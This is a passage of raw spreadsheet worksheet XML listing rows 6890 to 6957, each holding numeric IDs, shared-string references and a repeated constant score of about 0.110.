        <v>13690.0</v>
      </c>
      <c r="B6890" s="2">
        <v>3.611092E7</v>
      </c>
      <c r="C6890" s="2" t="s">
        <v>6543</v>
      </c>
      <c r="D6890" s="2">
        <v>1.0</v>
      </c>
      <c r="E6890" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6890" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6891" ht="15.75" customHeight="1">
      <c r="A6891" s="1">
        <v>15333.0</v>
      </c>
      <c r="B6891" s="2">
        <v>4.2569937E7</v>
      </c>
      <c r="C6891" s="2" t="s">
        <v>6544</v>
      </c>
      <c r="D6891" s="2">
        <v>1.0</v>
      </c>
      <c r="E6891" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6891" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6892" ht="15.75" customHeight="1">
      <c r="A6892" s="1">
        <v>15411.0</v>
      </c>
      <c r="B6892" s="2">
        <v>4.285575E7</v>
      </c>
      <c r="C6892" s="2" t="s">
        <v>6545</v>
      </c>
      <c r="D6892" s="2">
        <v>1.0</v>
      </c>
      <c r="E6892" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6892" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6893" ht="15.75" customHeight="1">
      <c r="A6893" s="1">
        <v>15623.0</v>
      </c>
      <c r="B6893" s="2">
        <v>4.3555119E7</v>
      </c>
      <c r="C6893" s="2" t="s">
        <v>6546</v>
      </c>
      <c r="D6893" s="2">
        <v>1.0</v>
      </c>
      <c r="E6893" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6893" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6894" ht="15.75" customHeight="1">
      <c r="A6894" s="1">
        <v>15895.0</v>
      </c>
      <c r="B6894" s="2">
        <v>4.4566326E7</v>
      </c>
      <c r="C6894" s="2" t="s">
        <v>6547</v>
      </c>
      <c r="D6894" s="2">
        <v>1.0</v>
      </c>
      <c r="E6894" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6894" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6895" ht="15.75" customHeight="1">
      <c r="A6895" s="1">
        <v>19083.0</v>
      </c>
      <c r="B6895" s="2">
        <v>5.4643717E7</v>
      </c>
      <c r="C6895" s="2" t="s">
        <v>6548</v>
      </c>
      <c r="D6895" s="2">
        <v>1.0</v>
      </c>
      <c r="E6895" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6895" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6896" ht="15.75" customHeight="1">
      <c r="A6896" s="1">
        <v>19220.0</v>
      </c>
      <c r="B6896" s="2">
        <v>5.5014226E7</v>
      </c>
      <c r="C6896" s="2" t="s">
        <v>6549</v>
      </c>
      <c r="D6896" s="2">
        <v>1.0</v>
      </c>
      <c r="E6896" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6896" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6897" ht="15.75" customHeight="1">
      <c r="A6897" s="1">
        <v>20028.0</v>
      </c>
      <c r="B6897" s="2">
        <v>6719753.0</v>
      </c>
      <c r="C6897" s="2" t="s">
        <v>6550</v>
      </c>
      <c r="D6897" s="2">
        <v>1.0</v>
      </c>
      <c r="E6897" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6897" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6898" ht="15.75" customHeight="1">
      <c r="A6898" s="1">
        <v>20175.0</v>
      </c>
      <c r="B6898" s="2">
        <v>1.0440454E7</v>
      </c>
      <c r="C6898" s="2" t="s">
        <v>6551</v>
      </c>
      <c r="D6898" s="2">
        <v>1.0</v>
      </c>
      <c r="E6898" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6898" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6899" ht="15.75" customHeight="1">
      <c r="A6899" s="1">
        <v>20432.0</v>
      </c>
      <c r="B6899" s="2">
        <v>1.2329898E7</v>
      </c>
      <c r="C6899" s="2" t="s">
        <v>6552</v>
      </c>
      <c r="D6899" s="2">
        <v>1.0</v>
      </c>
      <c r="E6899" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6899" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6900" ht="15.75" customHeight="1">
      <c r="A6900" s="1">
        <v>20478.0</v>
      </c>
      <c r="B6900" s="2">
        <v>1.282873E7</v>
      </c>
      <c r="C6900" s="2" t="s">
        <v>6553</v>
      </c>
      <c r="D6900" s="2">
        <v>1.0</v>
      </c>
      <c r="E6900" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6900" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6901" ht="15.75" customHeight="1">
      <c r="A6901" s="1">
        <v>20801.0</v>
      </c>
      <c r="B6901" s="2">
        <v>1.5277917E7</v>
      </c>
      <c r="C6901" s="2" t="s">
        <v>6554</v>
      </c>
      <c r="D6901" s="2">
        <v>1.0</v>
      </c>
      <c r="E6901" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6901" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6902" ht="15.75" customHeight="1">
      <c r="A6902" s="1">
        <v>21018.0</v>
      </c>
      <c r="B6902" s="2">
        <v>1.7382869E7</v>
      </c>
      <c r="C6902" s="2" t="s">
        <v>6555</v>
      </c>
      <c r="D6902" s="2">
        <v>1.0</v>
      </c>
      <c r="E6902" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6902" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6903" ht="15.75" customHeight="1">
      <c r="A6903" s="1">
        <v>21168.0</v>
      </c>
      <c r="B6903" s="2">
        <v>1.9017541E7</v>
      </c>
      <c r="C6903" s="2" t="s">
        <v>6556</v>
      </c>
      <c r="D6903" s="2">
        <v>1.0</v>
      </c>
      <c r="E6903" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6903" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6904" ht="15.75" customHeight="1">
      <c r="A6904" s="1">
        <v>21179.0</v>
      </c>
      <c r="B6904" s="2">
        <v>1.9191234E7</v>
      </c>
      <c r="C6904" s="2" t="s">
        <v>6557</v>
      </c>
      <c r="D6904" s="2">
        <v>1.0</v>
      </c>
      <c r="E6904" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6904" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6905" ht="15.75" customHeight="1">
      <c r="A6905" s="1">
        <v>21226.0</v>
      </c>
      <c r="B6905" s="2">
        <v>1.963762E7</v>
      </c>
      <c r="C6905" s="2" t="s">
        <v>6558</v>
      </c>
      <c r="D6905" s="2">
        <v>1.0</v>
      </c>
      <c r="E6905" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6905" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6906" ht="15.75" customHeight="1">
      <c r="A6906" s="1">
        <v>21259.0</v>
      </c>
      <c r="B6906" s="2">
        <v>2.0042012E7</v>
      </c>
      <c r="C6906" s="2" t="s">
        <v>6559</v>
      </c>
      <c r="D6906" s="2">
        <v>1.0</v>
      </c>
      <c r="E6906" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6906" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6907" ht="15.75" customHeight="1">
      <c r="A6907" s="1">
        <v>21269.0</v>
      </c>
      <c r="B6907" s="2">
        <v>2.0131769E7</v>
      </c>
      <c r="C6907" s="2" t="s">
        <v>6560</v>
      </c>
      <c r="D6907" s="2">
        <v>1.0</v>
      </c>
      <c r="E6907" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6907" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6908" ht="15.75" customHeight="1">
      <c r="A6908" s="1">
        <v>21581.0</v>
      </c>
      <c r="B6908" s="2">
        <v>2.3881235E7</v>
      </c>
      <c r="C6908" s="2" t="s">
        <v>6561</v>
      </c>
      <c r="D6908" s="2">
        <v>1.0</v>
      </c>
      <c r="E6908" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6908" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6909" ht="15.75" customHeight="1">
      <c r="A6909" s="1">
        <v>22185.0</v>
      </c>
      <c r="B6909" s="2">
        <v>3.1725545E7</v>
      </c>
      <c r="C6909" s="2" t="s">
        <v>6553</v>
      </c>
      <c r="D6909" s="2">
        <v>1.0</v>
      </c>
      <c r="E6909" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6909" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6910" ht="15.75" customHeight="1">
      <c r="A6910" s="1">
        <v>22259.0</v>
      </c>
      <c r="B6910" s="2">
        <v>3.2837811E7</v>
      </c>
      <c r="C6910" s="2" t="s">
        <v>6562</v>
      </c>
      <c r="D6910" s="2">
        <v>1.0</v>
      </c>
      <c r="E6910" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6910" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6911" ht="15.75" customHeight="1">
      <c r="A6911" s="1">
        <v>22394.0</v>
      </c>
      <c r="B6911" s="2">
        <v>3.5420441E7</v>
      </c>
      <c r="C6911" s="2" t="s">
        <v>6563</v>
      </c>
      <c r="D6911" s="2">
        <v>1.0</v>
      </c>
      <c r="E6911" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6911" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6912" ht="15.75" customHeight="1">
      <c r="A6912" s="1">
        <v>22527.0</v>
      </c>
      <c r="B6912" s="2">
        <v>3.7733047E7</v>
      </c>
      <c r="C6912" s="2" t="s">
        <v>6564</v>
      </c>
      <c r="D6912" s="2">
        <v>1.0</v>
      </c>
      <c r="E6912" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6912" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6913" ht="15.75" customHeight="1">
      <c r="A6913" s="1">
        <v>22622.0</v>
      </c>
      <c r="B6913" s="2">
        <v>4.0105472E7</v>
      </c>
      <c r="C6913" s="2" t="s">
        <v>6565</v>
      </c>
      <c r="D6913" s="2">
        <v>1.0</v>
      </c>
      <c r="E6913" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6913" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6914" ht="15.75" customHeight="1">
      <c r="A6914" s="1">
        <v>22928.0</v>
      </c>
      <c r="B6914" s="2">
        <v>4.859276E7</v>
      </c>
      <c r="C6914" s="2" t="s">
        <v>6566</v>
      </c>
      <c r="D6914" s="2">
        <v>1.0</v>
      </c>
      <c r="E6914" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6914" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6915" ht="15.75" customHeight="1">
      <c r="A6915" s="1">
        <v>23167.0</v>
      </c>
      <c r="B6915" s="2">
        <v>5.2018075E7</v>
      </c>
      <c r="C6915" s="2" t="s">
        <v>6567</v>
      </c>
      <c r="D6915" s="2">
        <v>1.0</v>
      </c>
      <c r="E6915" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6915" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6916" ht="15.75" customHeight="1">
      <c r="A6916" s="1">
        <v>23340.0</v>
      </c>
      <c r="B6916" s="2">
        <v>5.4743431E7</v>
      </c>
      <c r="C6916" s="2" t="s">
        <v>6568</v>
      </c>
      <c r="D6916" s="2">
        <v>1.0</v>
      </c>
      <c r="E6916" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6916" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6917" ht="15.75" customHeight="1">
      <c r="A6917" s="1">
        <v>23367.0</v>
      </c>
      <c r="B6917" s="2">
        <v>5.522177E7</v>
      </c>
      <c r="C6917" s="2" t="s">
        <v>6569</v>
      </c>
      <c r="D6917" s="2">
        <v>1.0</v>
      </c>
      <c r="E6917" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6917" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6918" ht="15.75" customHeight="1">
      <c r="A6918" s="1">
        <v>23813.0</v>
      </c>
      <c r="B6918" s="2">
        <v>7949096.0</v>
      </c>
      <c r="C6918" s="2" t="s">
        <v>6570</v>
      </c>
      <c r="D6918" s="2">
        <v>1.0</v>
      </c>
      <c r="E6918" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6918" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6919" ht="15.75" customHeight="1">
      <c r="A6919" s="1">
        <v>24018.0</v>
      </c>
      <c r="B6919" s="2">
        <v>9326156.0</v>
      </c>
      <c r="C6919" s="2" t="s">
        <v>6571</v>
      </c>
      <c r="D6919" s="2">
        <v>1.0</v>
      </c>
      <c r="E6919" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6919" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6920" ht="15.75" customHeight="1">
      <c r="A6920" s="1">
        <v>24046.0</v>
      </c>
      <c r="B6920" s="2">
        <v>9515697.0</v>
      </c>
      <c r="C6920" s="2" t="s">
        <v>6572</v>
      </c>
      <c r="D6920" s="2">
        <v>1.0</v>
      </c>
      <c r="E6920" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6920" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6921" ht="15.75" customHeight="1">
      <c r="A6921" s="1">
        <v>24146.0</v>
      </c>
      <c r="B6921" s="2">
        <v>1.0073925E7</v>
      </c>
      <c r="C6921" s="2" t="s">
        <v>6573</v>
      </c>
      <c r="D6921" s="2">
        <v>1.0</v>
      </c>
      <c r="E6921" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6921" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6922" ht="15.75" customHeight="1">
      <c r="A6922" s="1">
        <v>24223.0</v>
      </c>
      <c r="B6922" s="2">
        <v>1.0435516E7</v>
      </c>
      <c r="C6922" s="2" t="s">
        <v>6574</v>
      </c>
      <c r="D6922" s="2">
        <v>1.0</v>
      </c>
      <c r="E6922" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6922" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6923" ht="15.75" customHeight="1">
      <c r="A6923" s="1">
        <v>24453.0</v>
      </c>
      <c r="B6923" s="2">
        <v>1.0934969E7</v>
      </c>
      <c r="C6923" s="2" t="s">
        <v>6575</v>
      </c>
      <c r="D6923" s="2">
        <v>1.0</v>
      </c>
      <c r="E6923" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6923" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6924" ht="15.75" customHeight="1">
      <c r="A6924" s="1">
        <v>24782.0</v>
      </c>
      <c r="B6924" s="2">
        <v>1.1932839E7</v>
      </c>
      <c r="C6924" s="2" t="s">
        <v>6576</v>
      </c>
      <c r="D6924" s="2">
        <v>1.0</v>
      </c>
      <c r="E6924" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6924" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6925" ht="15.75" customHeight="1">
      <c r="A6925" s="1">
        <v>25961.0</v>
      </c>
      <c r="B6925" s="2">
        <v>1.5267699E7</v>
      </c>
      <c r="C6925" s="2" t="s">
        <v>6577</v>
      </c>
      <c r="D6925" s="2">
        <v>1.0</v>
      </c>
      <c r="E6925" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6925" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6926" ht="15.75" customHeight="1">
      <c r="A6926" s="1">
        <v>26043.0</v>
      </c>
      <c r="B6926" s="2">
        <v>1.547619E7</v>
      </c>
      <c r="C6926" s="2" t="s">
        <v>6578</v>
      </c>
      <c r="D6926" s="2">
        <v>1.0</v>
      </c>
      <c r="E6926" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6926" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6927" ht="15.75" customHeight="1">
      <c r="A6927" s="1">
        <v>26258.0</v>
      </c>
      <c r="B6927" s="2">
        <v>1.6374005E7</v>
      </c>
      <c r="C6927" s="2" t="s">
        <v>6579</v>
      </c>
      <c r="D6927" s="2">
        <v>1.0</v>
      </c>
      <c r="E6927" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6927" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6928" ht="15.75" customHeight="1">
      <c r="A6928" s="1">
        <v>26468.0</v>
      </c>
      <c r="B6928" s="2">
        <v>1.7382868E7</v>
      </c>
      <c r="C6928" s="2" t="s">
        <v>6555</v>
      </c>
      <c r="D6928" s="2">
        <v>1.0</v>
      </c>
      <c r="E6928" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6928" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6929" ht="15.75" customHeight="1">
      <c r="A6929" s="1">
        <v>26601.0</v>
      </c>
      <c r="B6929" s="2">
        <v>1.798606E7</v>
      </c>
      <c r="C6929" s="2" t="s">
        <v>6580</v>
      </c>
      <c r="D6929" s="2">
        <v>1.0</v>
      </c>
      <c r="E6929" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6929" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6930" ht="15.75" customHeight="1">
      <c r="A6930" s="1">
        <v>26854.0</v>
      </c>
      <c r="B6930" s="2">
        <v>1.901754E7</v>
      </c>
      <c r="C6930" s="2" t="s">
        <v>6581</v>
      </c>
      <c r="D6930" s="2">
        <v>1.0</v>
      </c>
      <c r="E6930" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6930" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6931" ht="15.75" customHeight="1">
      <c r="A6931" s="1">
        <v>27344.0</v>
      </c>
      <c r="B6931" s="2">
        <v>2.1459465E7</v>
      </c>
      <c r="C6931" s="2" t="s">
        <v>6582</v>
      </c>
      <c r="D6931" s="2">
        <v>1.0</v>
      </c>
      <c r="E6931" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6931" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6932" ht="15.75" customHeight="1">
      <c r="A6932" s="1">
        <v>27363.0</v>
      </c>
      <c r="B6932" s="2">
        <v>2.1663189E7</v>
      </c>
      <c r="C6932" s="2" t="s">
        <v>6583</v>
      </c>
      <c r="D6932" s="2">
        <v>1.0</v>
      </c>
      <c r="E6932" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6932" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6933" ht="15.75" customHeight="1">
      <c r="A6933" s="1">
        <v>27410.0</v>
      </c>
      <c r="B6933" s="2">
        <v>2.1815326E7</v>
      </c>
      <c r="C6933" s="2" t="s">
        <v>6584</v>
      </c>
      <c r="D6933" s="2">
        <v>1.0</v>
      </c>
      <c r="E6933" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6933" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6934" ht="15.75" customHeight="1">
      <c r="A6934" s="1">
        <v>27435.0</v>
      </c>
      <c r="B6934" s="2">
        <v>2.1929309E7</v>
      </c>
      <c r="C6934" s="2" t="s">
        <v>6585</v>
      </c>
      <c r="D6934" s="2">
        <v>1.0</v>
      </c>
      <c r="E6934" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6934" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6935" ht="15.75" customHeight="1">
      <c r="A6935" s="1">
        <v>27584.0</v>
      </c>
      <c r="B6935" s="2">
        <v>2.2529312E7</v>
      </c>
      <c r="C6935" s="2" t="s">
        <v>6586</v>
      </c>
      <c r="D6935" s="2">
        <v>1.0</v>
      </c>
      <c r="E6935" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6935" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6936" ht="15.75" customHeight="1">
      <c r="A6936" s="1">
        <v>27679.0</v>
      </c>
      <c r="B6936" s="2">
        <v>2.2966724E7</v>
      </c>
      <c r="C6936" s="2" t="s">
        <v>6587</v>
      </c>
      <c r="D6936" s="2">
        <v>1.0</v>
      </c>
      <c r="E6936" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6936" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6937" ht="15.75" customHeight="1">
      <c r="A6937" s="1">
        <v>27954.0</v>
      </c>
      <c r="B6937" s="2">
        <v>2.3881234E7</v>
      </c>
      <c r="C6937" s="2" t="s">
        <v>6561</v>
      </c>
      <c r="D6937" s="2">
        <v>1.0</v>
      </c>
      <c r="E6937" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6937" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6938" ht="15.75" customHeight="1">
      <c r="A6938" s="1">
        <v>28578.0</v>
      </c>
      <c r="B6938" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C6938" s="2" t="s">
        <v>6588</v>
      </c>
      <c r="D6938" s="2">
        <v>1.0</v>
      </c>
      <c r="E6938" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6938" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6939" ht="15.75" customHeight="1">
      <c r="A6939" s="1">
        <v>28653.0</v>
      </c>
      <c r="B6939" s="2">
        <v>2.7357568E7</v>
      </c>
      <c r="C6939" s="2" t="s">
        <v>6589</v>
      </c>
      <c r="D6939" s="2">
        <v>1.0</v>
      </c>
      <c r="E6939" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6939" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6940" ht="15.75" customHeight="1">
      <c r="A6940" s="1">
        <v>28828.0</v>
      </c>
      <c r="B6940" s="2">
        <v>2.8843351E7</v>
      </c>
      <c r="C6940" s="2" t="s">
        <v>6590</v>
      </c>
      <c r="D6940" s="2">
        <v>1.0</v>
      </c>
      <c r="E6940" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6940" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6941" ht="15.75" customHeight="1">
      <c r="A6941" s="1">
        <v>28921.0</v>
      </c>
      <c r="B6941" s="2">
        <v>2.9524788E7</v>
      </c>
      <c r="C6941" s="2" t="s">
        <v>6591</v>
      </c>
      <c r="D6941" s="2">
        <v>1.0</v>
      </c>
      <c r="E6941" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6941" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6942" ht="15.75" customHeight="1">
      <c r="A6942" s="1">
        <v>29128.0</v>
      </c>
      <c r="B6942" s="2">
        <v>3.0513628E7</v>
      </c>
      <c r="C6942" s="2" t="s">
        <v>6553</v>
      </c>
      <c r="D6942" s="2">
        <v>1.0</v>
      </c>
      <c r="E6942" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6942" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6943" ht="15.75" customHeight="1">
      <c r="A6943" s="1">
        <v>29154.0</v>
      </c>
      <c r="B6943" s="2">
        <v>3.0603918E7</v>
      </c>
      <c r="C6943" s="2" t="s">
        <v>6592</v>
      </c>
      <c r="D6943" s="2">
        <v>1.0</v>
      </c>
      <c r="E6943" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6943" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6944" ht="15.75" customHeight="1">
      <c r="A6944" s="1">
        <v>29170.0</v>
      </c>
      <c r="B6944" s="2">
        <v>3.0640151E7</v>
      </c>
      <c r="C6944" s="2" t="s">
        <v>6593</v>
      </c>
      <c r="D6944" s="2">
        <v>1.0</v>
      </c>
      <c r="E6944" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6944" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6945" ht="15.75" customHeight="1">
      <c r="A6945" s="1">
        <v>30185.0</v>
      </c>
      <c r="B6945" s="2">
        <v>3.7190209E7</v>
      </c>
      <c r="C6945" s="2" t="s">
        <v>6594</v>
      </c>
      <c r="D6945" s="2">
        <v>1.0</v>
      </c>
      <c r="E6945" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6945" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6946" ht="15.75" customHeight="1">
      <c r="A6946" s="1">
        <v>30187.0</v>
      </c>
      <c r="B6946" s="2">
        <v>3.7193123E7</v>
      </c>
      <c r="C6946" s="2" t="s">
        <v>6595</v>
      </c>
      <c r="D6946" s="2">
        <v>1.0</v>
      </c>
      <c r="E6946" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6946" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6947" ht="15.75" customHeight="1">
      <c r="A6947" s="1">
        <v>30283.0</v>
      </c>
      <c r="B6947" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C6947" s="2" t="s">
        <v>6564</v>
      </c>
      <c r="D6947" s="2">
        <v>1.0</v>
      </c>
      <c r="E6947" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6947" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6948" ht="15.75" customHeight="1">
      <c r="A6948" s="1">
        <v>31103.0</v>
      </c>
      <c r="B6948" s="2">
        <v>4.8592759E7</v>
      </c>
      <c r="C6948" s="2" t="s">
        <v>6566</v>
      </c>
      <c r="D6948" s="2">
        <v>1.0</v>
      </c>
      <c r="E6948" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6948" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6949" ht="15.75" customHeight="1">
      <c r="A6949" s="1">
        <v>31152.0</v>
      </c>
      <c r="B6949" s="2">
        <v>4891087.0</v>
      </c>
      <c r="C6949" s="2" t="s">
        <v>6596</v>
      </c>
      <c r="D6949" s="2">
        <v>1.0</v>
      </c>
      <c r="E6949" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6949" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6950" ht="15.75" customHeight="1">
      <c r="A6950" s="1">
        <v>31909.0</v>
      </c>
      <c r="B6950" s="2">
        <v>5299202.0</v>
      </c>
      <c r="C6950" s="2" t="s">
        <v>6597</v>
      </c>
      <c r="D6950" s="2">
        <v>1.0</v>
      </c>
      <c r="E6950" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6950" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6951" ht="15.75" customHeight="1">
      <c r="A6951" s="1">
        <v>31971.0</v>
      </c>
      <c r="B6951" s="2">
        <v>5.3160491E7</v>
      </c>
      <c r="C6951" s="2" t="s">
        <v>6598</v>
      </c>
      <c r="D6951" s="2">
        <v>1.0</v>
      </c>
      <c r="E6951" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6951" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6952" ht="15.75" customHeight="1">
      <c r="A6952" s="1">
        <v>32386.0</v>
      </c>
      <c r="B6952" s="2">
        <v>5.6199578E7</v>
      </c>
      <c r="C6952" s="2" t="s">
        <v>6599</v>
      </c>
      <c r="D6952" s="2">
        <v>1.0</v>
      </c>
      <c r="E6952" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6952" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6953" ht="15.75" customHeight="1">
      <c r="A6953" s="1">
        <v>32646.0</v>
      </c>
      <c r="B6953" s="2">
        <v>5867062.0</v>
      </c>
      <c r="C6953" s="2" t="s">
        <v>6600</v>
      </c>
      <c r="D6953" s="2">
        <v>1.0</v>
      </c>
      <c r="E6953" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6953" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6954" ht="15.75" customHeight="1">
      <c r="A6954" s="1">
        <v>32791.0</v>
      </c>
      <c r="B6954" s="2">
        <v>6138398.0</v>
      </c>
      <c r="C6954" s="2" t="s">
        <v>6601</v>
      </c>
      <c r="D6954" s="2">
        <v>1.0</v>
      </c>
      <c r="E6954" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6954" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6955" ht="15.75" customHeight="1">
      <c r="A6955" s="1">
        <v>32974.0</v>
      </c>
      <c r="B6955" s="2">
        <v>6560048.0</v>
      </c>
      <c r="C6955" s="2" t="s">
        <v>6602</v>
      </c>
      <c r="D6955" s="2">
        <v>1.0</v>
      </c>
      <c r="E6955" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6955" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6956" ht="15.75" customHeight="1">
      <c r="A6956" s="1">
        <v>33041.0</v>
      </c>
      <c r="B6956" s="2">
        <v>6739237.0</v>
      </c>
      <c r="C6956" s="2" t="s">
        <v>6603</v>
      </c>
      <c r="D6956" s="2">
        <v>1.0</v>
      </c>
      <c r="E6956" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6956" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6957" ht="15.75" customHeight="1">
      <c r="A6957" s="1">
        <v>33185.0</v>
      </c>
